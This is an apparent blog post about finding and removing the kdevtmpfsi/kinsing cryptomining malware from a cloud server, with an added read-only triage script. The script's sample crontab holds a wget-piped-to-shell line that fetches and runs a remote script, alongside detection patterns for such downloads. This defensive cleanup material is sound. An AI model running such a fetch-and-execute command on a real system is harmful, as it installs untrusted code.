Recently I was running some business data on several test servers. After a few days, one server suddenly became extremely slow: typing a command would hang, and sometimes I couldn't even connect. At first I thought it was a network problem, so I killed the process and ran it again. Finally I couldn't bear it any longer and went to the Ali Cloud console to restart the server, where I found that the CPU usage had reached 100%.
Then I killed the process and restarted the server. After the server came back up, the CPU was normal, so I assumed my data job had caused it. When I deployed the test package a few days later, the server was surprisingly slow again, and the CPU usage was 99.9%. It turned out that I was too naive.
I used the Linux top command to check what was taking up so much CPU.
The first thing in the list made me ask: what is this? Who deployed this? I asked the colleague next to me who usually takes the blame, but it seems he didn't do it, so this one can't be pinned on him. That can only mean…
What? A virus?
From past experience, isn't this the kind of thing that happens when you click on a pretty girl on some web page? And yet here I am, infected.
What is this thing?
Now that the server is infected, let's see what it is.
It is a mining virus. Everyone here has probably heard of mining, that is, mining coins; if I had any, I wouldn't be here painfully writing articles. Mining coins needs a lot of computing power, which means a lot of servers. Some people don't want to pay for that, so they use underhanded means to plant a script on our servers. For example, suppose we need to install Redis. Someone like me, whose English is not very good, may not go to the official website first but search Baidu instead. If the package you happen to find has had this thing planted in it, then unfortunately your server may end up working for someone else.
What to do about the virus
Since this virus makes our server very sluggish, it has to be killed. Readers who haven't worked much with Linux may have considered reinstalling the image.
You don’t have to.
First we find the process and kill it.
Next, delete the kdevtmpfsi file, which is usually in the /tmp directory.
There is also a kinsing process and file, which we kill and delete as well.
Note that on the several servers I tried, the kinsing file was not always in the same place, but we can see the file path in the way shown above; just find it and delete it.
At this point, we check the CPU usage with top and find that it is back to normal.
Just when I thought everything was going to be all right, reality hit me hard. Within minutes, the CPU usage was 99.96% again and I was about to break down.
After some in-depth searching on Baidu, I finally understood the problem.
Check the server's scheduled tasks with crontab -l and you will see the following task. If it is not one of yours, you can look up the IP in it; it is usually a foreign IP.
We just delete the scheduled task. The link in it is what downloads the files again after we kill the process and delete the files, and then runs them again through the script.
That's why, after I killed the virus, it reappeared a short time later.
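The checks above can be collected into one read-only script, shown here as an added example that is not part of the original post. The function names, the constructed sample crontab, and the extra locations it looks at (/var/tmp and the system cron directories) are assumptions, not something the article lists.

```shell
#!/bin/sh
# Added example: read-only triage for the cleanup steps above.
# It reports what to act on; it does not kill or delete anything.

MINER_NAMES="kdevtmpfsi kinsing"   # names taken from the article

# Constructed sample crontab (203.0.113.10 is a documentation address).
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://203.0.113.10/x.sh | sh > /dev/null 2>&1'

# Print "pid name exe-path" for every running process with one of the names.
list_miner_procs() {
    for name in $MINER_NAMES; do
        for pid in $(pgrep -x "$name" 2>/dev/null); do
            # /proc/<pid>/exe keeps the path even after the file is deleted
            exe=$(readlink "/proc/$pid/exe" 2>/dev/null) || exe=unknown
            echo "$pid $name $exe"
        done
    done
}

# Read crontab text on stdin and print non-comment entries that download
# with curl or wget, or that mention the miner names.
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' |
        grep -E '(curl|wget)[[:space:]]|kdevtmpfsi|kinsing' || true
}

# Current user's crontab plus the usual system cron locations.
scan_all_cron() {
    { crontab -l 2>/dev/null || true
      cat /etc/crontab /etc/cron.d/* /var/spool/cron/* \
          /var/spool/cron/crontabs/* 2>/dev/null || true
    } | suspicious_cron_lines
}

if [ "${1:-}" = "--report" ]; then
    echo "== miner processes ==";        list_miner_procs
    echo "== suspicious cron entries =="; scan_all_cron
    echo "== matching files in /tmp and /var/tmp =="
    find /tmp /var/tmp -maxdepth 2 \
        \( -name 'kdevtmpfsi*' -o -name 'kinsing*' \) 2>/dev/null
fi
```

Run it as root with --report so that every user's crontab is readable. Remove the cron entry first, then kill the processes and delete the files, and run the report again a few minutes later to confirm nothing has come back.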
At this point we have completely dealt with the virus. If you are using Ali Cloud ECS, you will actually be notified by SMS when this happens, but at the time I was too naive and didn't pay attention to it. In addition, the server's default SSH port is 22; it is best to change it to another port, otherwise the server is an easy target for attackers.
Now the server runs smoothly and no longer gets stuck.